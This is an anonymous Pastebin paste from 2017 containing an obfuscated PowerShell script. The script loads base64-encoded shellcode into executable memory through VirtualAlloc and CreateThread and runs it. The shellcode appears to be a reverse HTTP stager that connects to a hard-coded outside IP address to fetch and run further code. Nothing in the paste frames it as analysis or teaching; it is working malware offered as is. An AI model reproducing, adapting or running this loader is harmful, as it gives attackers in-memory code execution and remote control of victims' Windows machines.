SHARE
TWEET

Untitled

a guest Mar 13th, 2017 292 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. function oeIl1 {
  2.     Param ($mRJdu, $sXIUCf7H_3MS)      
  3.     $xZF = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
  4.    
  5.     return $xZF.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($xZF.GetMethod('GetModuleHandle')).Invoke($null, @($mRJdu)))), $sXIUCf7H_3MS))
  6. }
  7.  
  8. function sINlrYDK {
  9.     Param (
  10.         [Parameter(Position = 0, Mandatory = $True)] [Type[]] $cXm,
  11.         [Parameter(Position = 1)] [Type] $pzRhvFbn = [Void]
  12.     )
  13.    
  14.     $ydtJTxy = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
  15.     $ydtJTxy.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $cXm).SetImplementationFlags('Runtime, Managed')
  16.     $ydtJTxy.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $pzRhvFbn, $cXm).SetImplementationFlags('Runtime, Managed')
  17.    
  18.     return $ydtJTxy.CreateType()
  19. }
  20.  
  21. [Byte[]]$eyePao5PK7e = [System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1obmV0AGh3aW5pVGhMdyYH/9Ux21NTU1NTaDpWeaf/1VNTagNTU2hQEQAA6MwAAAAvODZTREo5aVY0OVczQ2JZSTc4aTJWQXBwMHpBcWJpMEJDTEt3WU0zZkZHcUgxeF9tWElGa01QRUpqSklJcm5jODhPbWJCT0wAUGhXiZ/G/9WJxlNoADLghFNTU1dTVmjrVS47/9WWagpfaIAzAACJ4GoEUGofVmh1Rp6G/9VTU1NTVmgtBhh7/9WFwHUIT3XZ6EsAAABqQGgAEAAAaAAAQABTaFikU+X/1ZNTU4nnV2gAIAAAU1ZoEpaJ4v/VhcB0z4sHAcOFwHXlWMNf6Hf///8xMzguMjAxLjc1LjIyNwC78LWiVmoAU//V")
  22.        
  23. $dszlZgm = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((oeIl1 kernel32.dll VirtualAlloc), (sINlrYDK @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $eyePao5PK7e.Length,0x3000, 0x40)
  24. [System.Runtime.InteropServices.Marshal]::Copy($eyePao5PK7e, 0, $dszlZgm, $eyePao5PK7e.length)
  25.  
  26. $saHTYhFSI9 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((oeIl1 kernel32.dll CreateThread), (sINlrYDK @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$dszlZgm,[IntPtr]::Zero,0,[IntPtr]::Zero)
  27. [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((oeIl1 kernel32.dll WaitForSingleObject), (sINlrYDK @([IntPtr], [Int32]))).Invoke($saHTYhFSI9,0xffffffff) | Out-Null
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top